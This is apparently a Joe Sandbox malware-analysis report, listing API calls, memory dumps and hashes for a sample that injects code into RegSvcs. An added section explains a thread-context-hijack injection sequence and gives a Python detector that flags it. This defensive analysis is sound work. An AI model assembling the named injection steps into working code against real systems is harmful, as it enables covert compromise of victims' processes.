                                                                  • Source File: 0000000B.00000002.2569875582.0000000007FA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 07FA0000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_11_2_7fa0000_rlJvZXSinaRi.jbxd
                                                                  Similarity
                                                                  • API ID: ResumeThread
                                                                  • String ID:
                                                                  • API String ID: 947044025-0
                                                                  • Opcode ID: 1814e69d1e819eb91bbd677ab987304b4e431ad0a1ddc2cc3ed3186e4671e89b
                                                                  • Instruction ID: 33c238c94659ab65e6c7eb544babf245b43b7e9e5ac014aa3c627d4ecae45530
                                                                  • Opcode Fuzzy Hash: 1814e69d1e819eb91bbd677ab987304b4e431ad0a1ddc2cc3ed3186e4671e89b
                                                                  • Instruction Fuzzy Hash: BF1128B1D003498FDB20DFAAC4447EEFBF4AF88724F14841AD519A7240CB796944CFA5
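Taken together, the routines above from the 07FA0000 region of process 0xB cover every stage of a thread-context hijack: VirtualAllocEx reserves memory in the target process, WriteProcessMemory fills it, Wow64SetThreadContext (the 32-bit-context form of SetThreadContext) rewrites the suspended thread's register context, and ResumeThread lets it run, with ReadProcessMemory used to inspect the target along the way. The report prints each call in isolation, one function at a time. The Python below is an added example, written for this page and not part of the Joe Sandbox report or its tooling: it reads the report's own "APIs" bullets and raw `control_flow_graph` node strings, groups the calls by the memory region they were disassembled from, and flags a region when all four stages appear in it. The stage table, the high/medium/none levels and the SAMPLE_REPORT text (assembled from the bullets above, trimmed to the lines the parser needs) are my constructions.

```python
import re
from dataclasses import dataclass
from typing import Dict, List, Tuple

# Regexes for the two kinds of evidence Joe Sandbox prints per disassembled function:
# an "APIs" bullet with a call-site address, and a raw control_flow_graph node list in
# which a basic block may carry the name of the API it calls.
API_LINE = re.compile(r"^\s*•\s*(?P<api>\w+)\.(?P<mod>\w+)\([^)]*\),\s*ref:\s*(?P<ref>[0-9A-Fa-f]+)")
SOURCE_LINE = re.compile(r"^\s*•\s*Source File:\s*(?P<dump>\S+),\s*Offset:\s*(?P<off>[0-9A-Fa-f]+)")
CFG_NODE = re.compile(r"\b\d+\s+(?P<start>[0-9a-f]{6,8})-(?P<end>[0-9a-f]{6,8})(?:\s+(?P<api>[A-Z]\w*))?")

# Stage table (my own, not the report's): the four calls a thread-context hijack needs.
# Wow64SetThreadContext is the 32-bit-context form of SetThreadContext and counts the same.
STAGES: Dict[str, frozenset] = {
    "alloc":   frozenset({"VirtualAllocEx", "NtAllocateVirtualMemory", "ZwAllocateVirtualMemory"}),
    "write":   frozenset({"WriteProcessMemory", "NtWriteVirtualMemory", "ZwWriteVirtualMemory"}),
    "context": frozenset({"SetThreadContext", "Wow64SetThreadContext", "NtSetContextThread"}),
    "resume":  frozenset({"ResumeThread", "NtResumeThread"}),
}
SUPPORTING = frozenset({"ReadProcessMemory", "NtUnmapViewOfSection", "Wow64GetThreadContext",
                        "GetThreadContext", "CreateProcessW", "CreateProcessA"})

@dataclass(frozen=True)
class Call:
    api: str
    where: str  # "ref: 07FAC3A6" for an API bullet, "block 7fac270-7fac2e7" for a CFG node

@dataclass
class Finding:
    pid: int
    base: int
    stages: Dict[str, List[str]]
    supporting: List[str]
    level: str
    calls: List[Call]

def parse_report(text: str) -> Dict[Tuple[int, int], List[Call]]:
    """Group calls by (process id, region base). A function's API bullets and CFG line
    come before its 'Source File' bullet, so calls are buffered until that bullet."""
    regions: Dict[Tuple[int, int], List[Call]] = {}
    pending: List[Call] = []
    for line in text.splitlines():
        if line.lstrip().startswith("control_flow_graph"):
            for m in CFG_NODE.finditer(line):
                if m.group("api"):
                    pending.append(Call(m.group("api"), f"block {m.group('start')}-{m.group('end')}"))
            continue
        m = API_LINE.match(line)
        if m:
            pending.append(Call(m.group("api"), f"ref: {m.group('ref')}"))
            continue
        m = SOURCE_LINE.match(line)
        if m:
            pid = int(m.group("dump").split(".")[0], 16)  # leading field of the .sdmp name
            regions.setdefault((pid, int(m.group("off"), 16)), []).extend(pending)
            pending = []
    return regions

def assess_region(pid: int, base: int, calls: List[Call]) -> Finding:
    seen = {c.api for c in calls}
    stages = {s: sorted(seen & apis) for s, apis in STAGES.items() if seen & apis}
    if len(stages) == len(STAGES):
        level = "high"    # every stage present in one code region
    elif len(stages) >= 2:
        level = "medium"  # e.g. alloc+write alone: a loader writing into its own child
    else:
        level = "none"
    return Finding(pid, base, stages, sorted(seen & SUPPORTING), level, calls)

def scan(text: str) -> List[Finding]:
    rank = {"high": 0, "medium": 1, "none": 2}
    found = [assess_region(p, b, c) for (p, b), c in parse_report(text).items()]
    return sorted(found, key=lambda f: (rank[f.level], f.pid, f.base))

# Constructed input: the evidence lines of the report above, reduced to what the parser needs.
SAMPLE_REPORT = """\
control_flow_graph 256 7fac320-7fac373 258 7fac383-7fac3b3 Wow64SetThreadContext 256->258 259 7fac375-7fac381 256->259
• Wow64SetThreadContext.KERNEL32(?,00000000), ref: 07FAC3A6
• Source File: 0000000B.00000002.2569875582.0000000007FA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 07FA0000, based on PE: false
• WriteProcessMemory.KERNELBASE(?,?,00000000,?,?), ref: 07FAC988
• Source File: 0000000B.00000002.2569875582.0000000007FA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 07FA0000, based on PE: false
• ReadProcessMemory.KERNELBASE(?,?,?,?,?), ref: 07FACA68
• Source File: 0000000B.00000002.2569875582.0000000007FA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 07FA0000, based on PE: false
• VirtualAllocEx.KERNELBASE(?,?,?,?,?), ref: 07FAC8A6
• Source File: 0000000B.00000002.2569875582.0000000007FA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 07FA0000, based on PE: false
control_flow_graph 310 7fac270-7fac2e7 ResumeThread 313 7fac2e9-7fac2ef 310->313 314 7fac2f0-7fac315 310->314 313->314
• Source File: 0000000B.00000002.2569875582.0000000007FA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 07FA0000, based on PE: false
• PostMessageW.USER32(?,?,?,?), ref: 057B11ED
• Source File: 0000000B.00000002.2568607319.00000000057B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 057B0000, based on PE: false
"""

if __name__ == "__main__":
    for f in scan(SAMPLE_REPORT):
        print(f"pid {f.pid} region {f.base:08X}: {f.level}; stages={f.stages}; supporting={f.supporting}")
```

Two details matter in practice. The ResumeThread routine has no "ref:" bullet in the report, only a basic block labelled with the API name, so the CFG node list is parsed as a second evidence source rather than relying on the bullets alone. And grouping by memory region is deliberate: the same four APIs spread across unrelated modules of a process are much weaker evidence than all four sitting in one dynamically allocated, non-PE region such as 07FA0000, which is what the sandbox's "injects a PE file into a foreign process" style verdicts rest on.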
                                                                  APIs
                                                                  • PostMessageW.USER32(?,?,?,?), ref: 057B11ED
                                                                  Memory Dump Source
                                                                  • Source File: 0000000B.00000002.2568607319.00000000057B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 057B0000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_11_2_57b0000_rlJvZXSinaRi.jbxd
                                                                  Similarity
                                                                  • API ID: MessagePost
                                                                  • String ID:
                                                                  • API String ID: 410705778-0
                                                                  • Opcode ID: dea41bd93f212d398578a5912102d319f0c8e41661291d4127ed137aac5a6419
                                                                  • Instruction ID: 3d9b5b0d4863898481fa2f0b85cbe66e3aa3bf97cb4ca5d90e4cbf8d6b9dd7d1
                                                                  • Opcode Fuzzy Hash: dea41bd93f212d398578a5912102d319f0c8e41661291d4127ed137aac5a6419
                                                                  • Instruction Fuzzy Hash: 7F11F5B5900349DFDB10DF9AD885BDEBBF8FB48720F108419E519A7200D375AA44CFA1
                                                                  APIs
                                                                  • PostMessageW.USER32(?,?,?,?), ref: 057B11ED
                                                                  Memory Dump Source
                                                                  • Source File: 0000000B.00000002.2568607319.00000000057B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 057B0000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_11_2_57b0000_rlJvZXSinaRi.jbxd
                                                                  Similarity
                                                                  • API ID: MessagePost
                                                                  • String ID:
                                                                  • API String ID: 410705778-0
                                                                  • Opcode ID: b7779168707521660d8677795e5d063c5a94c9b98f9546a899348c43ec62c63e
                                                                  • Instruction ID: cf01a4926c5d613bdaebba1e5f82a87ed297294d3ccb1777a13e4b6751670715
                                                                  • Opcode Fuzzy Hash: b7779168707521660d8677795e5d063c5a94c9b98f9546a899348c43ec62c63e
                                                                  • Instruction Fuzzy Hash: B01103B5800349DFDB10CF9AC884BDEBBF8EB48720F10841AD518A7200C375AA44CFA1
                                                                  Memory Dump Source
                                                                  • Source File: 0000000B.00000002.2553656151.000000000154D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0154D000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_11_2_154d000_rlJvZXSinaRi.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: 5598fe175b4ebcd087c4ce52d3bbb4eaeadc59345ac05c0a2e8adbddf5ec4754
                                                                  • Instruction ID: e5108adb0fd84aee09415eb91bded8bcdb64b3c72dfaecb697387fdddef86b75
                                                                  • Opcode Fuzzy Hash: 5598fe175b4ebcd087c4ce52d3bbb4eaeadc59345ac05c0a2e8adbddf5ec4754
                                                                  • Instruction Fuzzy Hash: 822133B2500200DFDB05DF48D9C0B6ABFB1FB98318F20856CE90A0F256C776D856CBA2
                                                                  Memory Dump Source
                                                                  • Source File: 0000000B.00000002.2553696470.000000000155D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0155D000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_11_2_155d000_rlJvZXSinaRi.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: 418a4c0a1b00765ad1d3a293a07406500a3d9a758d050a2c7093eb1abc22bb59
                                                                  • Instruction ID: 6819d5da57ae7f02b71c53011bd09764dd12e6e1f43992d894291f6313e0be22
                                                                  • Opcode Fuzzy Hash: 418a4c0a1b00765ad1d3a293a07406500a3d9a758d050a2c7093eb1abc22bb59
                                                                  • Instruction Fuzzy Hash: 5C210372504200EFDB41DF94C5D0B1ABBB1FB88324F20C96EDD094F252C37AD846CA61
                                                                  Memory Dump Source
                                                                  • Source File: 0000000B.00000002.2553696470.000000000155D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0155D000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_11_2_155d000_rlJvZXSinaRi.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: 84459a020d7745f65ba6cf05ddcdb41e6b0e573759b7f88de43d03fa1b4810f9
                                                                  • Instruction ID: 0d6232d784a3635d941f66b57b06cda1310101efd375e47db4447c3a6c075d39
                                                                  • Opcode Fuzzy Hash: 84459a020d7745f65ba6cf05ddcdb41e6b0e573759b7f88de43d03fa1b4810f9
                                                                  • Instruction Fuzzy Hash: E7210076604204DFDB55DF58D990B2ABBB1FB88314F20C96EDD0A4F262D33AD847CA61
                                                                  Memory Dump Source
                                                                  • Source File: 0000000B.00000002.2553696470.000000000155D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0155D000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_11_2_155d000_rlJvZXSinaRi.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: 5c605dd613165913d4f0e3ebcfc63c7336a738dcc24d55a37bbe5f32962888d6
                                                                  • Instruction ID: ed2aa18031d3e22c9c22cdda018a8f7641a37021a19ec8344e3619d959c1f660
                                                                  • Opcode Fuzzy Hash: 5c605dd613165913d4f0e3ebcfc63c7336a738dcc24d55a37bbe5f32962888d6
                                                                  • Instruction Fuzzy Hash: 652183755083849FDB02CF24D994715BF71FB46214F28C5DAD8498F2A7D33A9806CB62
                                                                  Memory Dump Source
                                                                  • Source File: 0000000B.00000002.2553656151.000000000154D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0154D000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_11_2_154d000_rlJvZXSinaRi.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: cfb52f8b9dfce4186a4761286b1afaf252fc13293eafdb1bf8f112f6695a61f7
                                                                  • Instruction ID: 5b0667cc5cdd74b9f21bd983b1a40ea8e41baae513212f7652249b18d7e89105
                                                                  • Opcode Fuzzy Hash: cfb52f8b9dfce4186a4761286b1afaf252fc13293eafdb1bf8f112f6695a61f7
                                                                  • Instruction Fuzzy Hash: A211AF76504280CFDB16CF58D5C4B5ABF71FB94328F2486A9D9090B257C33AD456CBA2
                                                                  Memory Dump Source
                                                                  • Source File: 0000000B.00000002.2553696470.000000000155D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0155D000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_11_2_155d000_rlJvZXSinaRi.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: 2ccfe305154e95a536d18b49939e535c9c69fd109e9eb5688aea898868e671a0
                                                                  • Instruction ID: 2540aa2b4cf0d29dde1db56616c2ac6059d3761a680bfe944b2af964511ebbc7
                                                                  • Opcode Fuzzy Hash: 2ccfe305154e95a536d18b49939e535c9c69fd109e9eb5688aea898868e671a0
                                                                  • Instruction Fuzzy Hash: 0F11BB76504280DFCB42CF54C5D0B19BBB1FB84224F24C6AEDC494F696C33AD44ACB61

                                                                  Execution Graph

Execution Coverage: 0.1%
Dynamic/Decrypted Code Coverage: 100%
Signature Coverage: 0%
Total number of Nodes: 1
Total number of Limit Nodes: 0
                                                                  execution_graph 62852 19b2c1d LdrInitializeThunk

Control-flow Graph
• Basic blocks: 19b2c0a-19b2c0f; 19b2c1f-19b2c26 (calls LdrInitializeThunk); 19b2c11-19b2c18
• Edges: 19b2c0a -> 19b2c1f, 19b2c0a -> 19b2c11
                                                                  APIs
                                                                  • LdrInitializeThunk.NTDLL(019CFD4F,000000FF,00000024,01A66634,00000004,00000000,?,-00000018,7D810F61,?,?,01988B12,?,?,?,?), ref: 019B2C24
                                                                  Memory Dump Source
                                                                  • Source File: 00000011.00000002.2710676018.0000000001966000.00000040.00001000.00020000.00000000.sdmp, Offset: 01940000, based on PE: true
                                                                  • Associated: 00000011.00000002.2710676018.0000000001940000.00000040.00001000.00020000.00000000.sdmp
                                                                  • Associated: 00000011.00000002.2710676018.0000000001947000.00000040.00001000.00020000.00000000.sdmp
                                                                  • Associated: 00000011.00000002.2710676018.00000000019C0000.00000040.00001000.00020000.00000000.sdmp
                                                                  • Associated: 00000011.00000002.2710676018.00000000019C6000.00000040.00001000.00020000.00000000.sdmp
                                                                  • Associated: 00000011.00000002.2710676018.0000000001A02000.00000040.00001000.00020000.00000000.sdmp
                                                                  • Associated: 00000011.00000002.2710676018.0000000001A63000.00000040.00001000.00020000.00000000.sdmp
                                                                  • Associated: 00000011.00000002.2710676018.0000000001A69000.00000040.00001000.00020000.00000000.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_17_2_1940000_RegSvcs.jbxd
                                                                  Similarity
                                                                  • API ID: InitializeThunk
                                                                  • String ID:
                                                                  • API String ID: 2994545307-0
                                                                  • Opcode ID: 59c926e8ad3f749f031143552928866c23f695cce07cbd687ae47eba1740bac4
                                                                  • Instruction ID: 2671905b16960eb7a1cf2b8e55f745b529dd6f263d206da91a652c66d3e9cd7e
                                                                  • Opcode Fuzzy Hash: 59c926e8ad3f749f031143552928866c23f695cce07cbd687ae47eba1740bac4
                                                                  • Instruction Fuzzy Hash: 6CB09B71D015C5C5DA11E764470C7177A44B7D0702F15C065D2470641F4739D5D1E276

                                                                  Control-flow Graph

                                                                  • Executed
                                                                  • Not Executed
                                                                  control_flow_graph 5 19b2df0-19b2dfc LdrInitializeThunk
                                                                  APIs
                                                                  • LdrInitializeThunk.NTDLL(019EE73E,0000005A,01A4D040,00000020,00000000,01A4D040,00000080,019D4A81,00000000,-00000001,-00000001,00000002,00000000,?,-00000001,019BAE00), ref: 019B2DFA
                                                                  Memory Dump Source
                                                                  • Source File: 00000011.00000002.2710676018.0000000001966000.00000040.00001000.00020000.00000000.sdmp, Offset: 01940000, based on PE: true
                                                                  • Associated: 00000011.00000002.2710676018.0000000001940000.00000040.00001000.00020000.00000000.sdmp
                                                                  • Associated: 00000011.00000002.2710676018.0000000001947000.00000040.00001000.00020000.00000000.sdmp
                                                                  • Associated: 00000011.00000002.2710676018.00000000019C0000.00000040.00001000.00020000.00000000.sdmp
                                                                  • Associated: 00000011.00000002.2710676018.00000000019C6000.00000040.00001000.00020000.00000000.sdmp
                                                                  • Associated: 00000011.00000002.2710676018.0000000001A02000.00000040.00001000.00020000.00000000.sdmp
                                                                  • Associated: 00000011.00000002.2710676018.0000000001A63000.00000040.00001000.00020000.00000000.sdmp
                                                                  • Associated: 00000011.00000002.2710676018.0000000001A69000.00000040.00001000.00020000.00000000.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_17_2_1940000_RegSvcs.jbxd
                                                                  Similarity
                                                                  • API ID: InitializeThunk
                                                                  • String ID:
                                                                  • API String ID: 2994545307-0
                                                                  • Opcode ID: bdbe98773f166c4b03beb97bc556d95f5a3b4bbdd9d7530fe07f9f36ae1c034a
                                                                  • Instruction ID: b6ba6445005381e23c074b49bc5fc46735f2de8aa1404d9ada11d2f24677947e
                                                                  • Opcode Fuzzy Hash: bdbe98773f166c4b03beb97bc556d95f5a3b4bbdd9d7530fe07f9f36ae1c034a
                                                                  • Instruction Fuzzy Hash: A690023120150413D111715D4508707404D97D0641F95C416A0864558DD6578A52A222

                                                                  Control-flow Graph

                                                                  • Executed
                                                                  • Not Executed
                                                                  control_flow_graph 4 19b2c1d-19b2c26 LdrInitializeThunk
                                                                  APIs
                                                                  • LdrInitializeThunk.NTDLL(019CFD4F,000000FF,00000024,01A66634,00000004,00000000,?,-00000018,7D810F61,?,?,01988B12,?,?,?,?), ref: 019B2C24
                                                                  Memory Dump Source
                                                                  • Source File: 00000011.00000002.2710676018.0000000001966000.00000040.00001000.00020000.00000000.sdmp, Offset: 01940000, based on PE: true
                                                                  • Associated: 00000011.00000002.2710676018.0000000001940000.00000040.00001000.00020000.00000000.sdmp
                                                                  • Associated: 00000011.00000002.2710676018.0000000001947000.00000040.00001000.00020000.00000000.sdmp
                                                                  • Associated: 00000011.00000002.2710676018.00000000019C0000.00000040.00001000.00020000.00000000.sdmp
                                                                  • Associated: 00000011.00000002.2710676018.00000000019C6000.00000040.00001000.00020000.00000000.sdmp
                                                                  • Associated: 00000011.00000002.2710676018.0000000001A02000.00000040.00001000.00020000.00000000.sdmp
                                                                  • Associated: 00000011.00000002.2710676018.0000000001A63000.00000040.00001000.00020000.00000000.sdmp
                                                                  • Associated: 00000011.00000002.2710676018.0000000001A69000.00000040.00001000.00020000.00000000.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_17_2_1940000_RegSvcs.jbxd
                                                                  Similarity
                                                                  • API ID: InitializeThunk
                                                                  • String ID:
                                                                  • API String ID: 2994545307-0
                                                                  • Opcode ID: b497df8a9bee1b1d6ddce710c28593f98a6e1f4d4afb39ff49d3449b06f62be0
                                                                  • Instruction ID: 51c9b72bffae7835ef487a73c59b28abb1babaab401de615241266cb9fb3bf4c
                                                                  • Opcode Fuzzy Hash: b497df8a9bee1b1d6ddce710c28593f98a6e1f4d4afb39ff49d3449b06f62be0
                                                                  • Instruction Fuzzy Hash: E1A00231551216478292AA19488D46EB158BBD421134DC346D1468A45BD7255492B6A6

                                                                  Control-flow Graph

                                                                  • Executed
                                                                  • Not Executed
                                                                  control_flow_graph 6 19b35c0-19b35cc LdrInitializeThunk
                                                                  APIs
                                                                  Memory Dump Source
                                                                  • Source File: 00000011.00000002.2710676018.0000000001966000.00000040.00001000.00020000.00000000.sdmp, Offset: 01940000, based on PE: true
                                                                  • Associated: 00000011.00000002.2710676018.0000000001940000.00000040.00001000.00020000.00000000.sdmp
                                                                  • Associated: 00000011.00000002.2710676018.0000000001947000.00000040.00001000.00020000.00000000.sdmp
                                                                  • Associated: 00000011.00000002.2710676018.00000000019C0000.00000040.00001000.00020000.00000000.sdmp
                                                                  • Associated: 00000011.00000002.2710676018.00000000019C6000.00000040.00001000.00020000.00000000.sdmp
                                                                  • Associated: 00000011.00000002.2710676018.0000000001A02000.00000040.00001000.00020000.00000000.sdmp
                                                                  • Associated: 00000011.00000002.2710676018.0000000001A63000.00000040.00001000.00020000.00000000.sdmp
                                                                  • Associated: 00000011.00000002.2710676018.0000000001A69000.00000040.00001000.00020000.00000000.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_17_2_1940000_RegSvcs.jbxd
                                                                  Similarity
                                                                  • API ID: InitializeThunk
                                                                  • String ID:
                                                                  • API String ID: 2994545307-0
                                                                  • Opcode ID: c9ae0fa1434d86dad15fbea305fea12893509184904a1354b41e5a44900b9ee7
                                                                  • Instruction ID: 09062d2f6dc61e30a108a396d8538426a5c6145c516dfae7210b717ebb33cf4a
                                                                  • Opcode Fuzzy Hash: c9ae0fa1434d86dad15fbea305fea12893509184904a1354b41e5a44900b9ee7
                                                                  • Instruction Fuzzy Hash: 6E90023160560402D100715D4518706504997D0601F65C415A0864568DC7968A5166A3

                                                                  Control-flow Graph

                                                                  • Executed
                                                                  • Not Executed
                                                                  control_flow_graph 19 42e443-42e484 call 42e933 23 42e486-42e4a3 19->23 24 42e4de-42e4e3 19->24 26 42e4b6-42e4db 23->26 27 42e4a5-42e4ad 23->27 26->24 29 42e4b3 27->29 29->26
                                                                  Memory Dump Source
                                                                  • Source File: 00000011.00000002.2710154162.000000000042E000.00000040.00000400.00020000.00000000.sdmp, Offset: 0042E000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_17_2_42e000_RegSvcs.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: b91d6c93db0535fe72404564a29c3e6695632f1d3c42c2318da097e51fd83d29
                                                                  • Instruction ID: 4366241f30172668ac266cf9dbbaaf2ab3a96406b79bd4ea90d7b1ecfc278b4f
                                                                  • Opcode Fuzzy Hash: b91d6c93db0535fe72404564a29c3e6695632f1d3c42c2318da097e51fd83d29
                                                                  • Instruction Fuzzy Hash: 6B017971D0122866FB60EB95AC42FD973B89B08315F4006DAF50CA25C1FF74A78C8A55

                                                                  Control-flow Graph

                                                                  • Executed
                                                                  • Not Executed
                                                                  control_flow_graph 7 42e43e-42e45a 8 42e469-42e470 7->8 9 42e464 call 42e933 7->9 10 42e47f-42e484 8->10 9->8 11 42e486-42e48f 10->11 12 42e4de-42e4e3 10->12 13 42e49e-42e4a3 11->13 14 42e4b6-42e4db 13->14 15 42e4a5-42e4ad 13->15 14->12 17 42e4b3 15->17 17->14
                                                                  Memory Dump Source
                                                                  • Source File: 00000011.00000002.2710154162.000000000042E000.00000040.00000400.00020000.00000000.sdmp, Offset: 0042E000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_17_2_42e000_RegSvcs.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: d1f73a97459dc5326ad298b62fd1992b1f71635c7eaa89ed498aed683d0cc593
                                                                  • Instruction ID: 404c73420e7ccc61c58b20341cebbccbd52cb142bdd450d9b6ac3c885e858c85
                                                                  • Opcode Fuzzy Hash: d1f73a97459dc5326ad298b62fd1992b1f71635c7eaa89ed498aed683d0cc593
                                                                  • Instruction Fuzzy Hash: 42019671D021246AFB60EB95AC42FDDB3B49B08305F400ADAE508A2581EF78A7888B55

                                                                  Control-flow Graph

                                                                  • Executed
                                                                  • Not Executed
                                                                  control_flow_graph 31 42e7f7-42e801 32 42e803-42e82e 31->32 33 42e834-42e845 32->33
                                                                  Memory Dump Source
                                                                  • Source File: 00000011.00000002.2710154162.000000000042E000.00000040.00000400.00020000.00000000.sdmp, Offset: 0042E000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_17_2_42e000_RegSvcs.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: f517df6aac4fc84ce8a87d0679e17b2a921ba94886c7872b57f22e959787194e
                                                                  • Instruction ID: 31242dfcbd3f96dd699b4558cde109ee15ad417a935ac94cd5934c0012438835
                                                                  • Opcode Fuzzy Hash: f517df6aac4fc84ce8a87d0679e17b2a921ba94886c7872b57f22e959787194e
                                                                  • Instruction Fuzzy Hash: C0F03A7661030AAFDB04CF55D885EEBB3ADBB88350F44C219FD198B641EB75E910CBA0

                                                                  Control-flow Graph

                                                                  • Executed
                                                                  • Not Executed
                                                                  control_flow_graph 34 42e969-42e988 35 42e98e-42e995 34->35 36 42e997-42e999 35->36 37 42e9a9-42e9ac 35->37 36->37 38 42e99b-42e9a7 call 42e933 36->38 38->37
                                                                  Memory Dump Source
                                                                  • Source File: 00000011.00000002.2710154162.000000000042E000.00000040.00000400.00020000.00000000.sdmp, Offset: 0042E000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_17_2_42e000_RegSvcs.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: 91ad61eaa096fd1b48b4794f7a42c5454aa66564d8e26f254c8216750448d8ed
                                                                  • Instruction ID: 9450f4893f1b544faf21d748d5bf1faa69d539990d9b7b546b78aef50944f596
                                                                  • Opcode Fuzzy Hash: 91ad61eaa096fd1b48b4794f7a42c5454aa66564d8e26f254c8216750448d8ed
                                                                  • Instruction Fuzzy Hash: 25E09B72F412246BD7209666AC05FABB768DFD1760F18007FFD0897341E175585087D9

                                                                  Control-flow Graph

                                                                  • Executed
                                                                  • Not Executed
                                                                  control_flow_graph 43 42e973-42e988 44 42e98e-42e995 43->44 45 42e997-42e999 44->45 46 42e9a9-42e9ac 44->46 45->46 47 42e99b-42e9a7 call 42e933 45->47 47->46
                                                                  Memory Dump Source
                                                                  • Source File: 00000011.00000002.2710154162.000000000042E000.00000040.00000400.00020000.00000000.sdmp, Offset: 0042E000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_17_2_42e000_RegSvcs.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: 72c85ca60cf26629b888706018e63b4fd17f9be6f1efe7643e2c5c8123341bf7
                                                                  • Instruction ID: b45b16270b7c92ecc088d3bbc55ba942c8e19ef5250ac7cf6bfce4062317808b
                                                                  • Opcode Fuzzy Hash: 72c85ca60cf26629b888706018e63b4fd17f9be6f1efe7643e2c5c8123341bf7
                                                                  • Instruction Fuzzy Hash: 04E0D87270022427D620554AAC05FAB735C9FC0B20F48002BFE0897301D164A84082E9

                                                                  Control-flow Graph

                                                                  • Executed
                                                                  • Not Executed
                                                                  control_flow_graph 41 42e803-42e82e 42 42e834-42e845 41->42
                                                                  Memory Dump Source
                                                                  • Source File: 00000011.00000002.2710154162.000000000042E000.00000040.00000400.00020000.00000000.sdmp, Offset: 0042E000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_17_2_42e000_RegSvcs.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: e5fdaa5cb08acbbdf9c8b0a0c6bbe4ed815358be749576dea5613706cb188032
                                                                  • Instruction ID: ed3f3c4a1f71d5893b28c54a4458e4a2cb9e16b5f970c0aa03921f96b0cc64a3
                                                                  • Opcode Fuzzy Hash: e5fdaa5cb08acbbdf9c8b0a0c6bbe4ed815358be749576dea5613706cb188032
                                                                  • Instruction Fuzzy Hash: EFF098B6610209AFDB04CF59D885EEB73A9BB88750F048559FD198B241D774EA108BA1

                                                                  Control-flow Graph

                                                                  • Executed
                                                                  • Not Executed
                                                                  control_flow_graph 50 42e893-42e8a6 51 42e8ac-42e8b0 50->51
                                                                  Memory Dump Source
                                                                  • Source File: 00000011.00000002.2710154162.000000000042E000.00000040.00000400.00020000.00000000.sdmp, Offset: 0042E000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_17_2_42e000_RegSvcs.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: 1588e10cb8000158141308b7c049b3d6da6c26fcd9cfad5ec22e1243578cb56d
                                                                  • Instruction ID: 3eca5127519bf68b1d5e67e2a562a6eab0631c4a37908332f397cdab7da05a69
                                                                  • Opcode Fuzzy Hash: 1588e10cb8000158141308b7c049b3d6da6c26fcd9cfad5ec22e1243578cb56d
                                                                  • Instruction Fuzzy Hash: 9AC012716002086BDB00DA88DC46F66339C9748610F444455B91C8B241D571B9504698

                                                                  Control-flow Graph

                                                                  • Executed
                                                                  • Not Executed
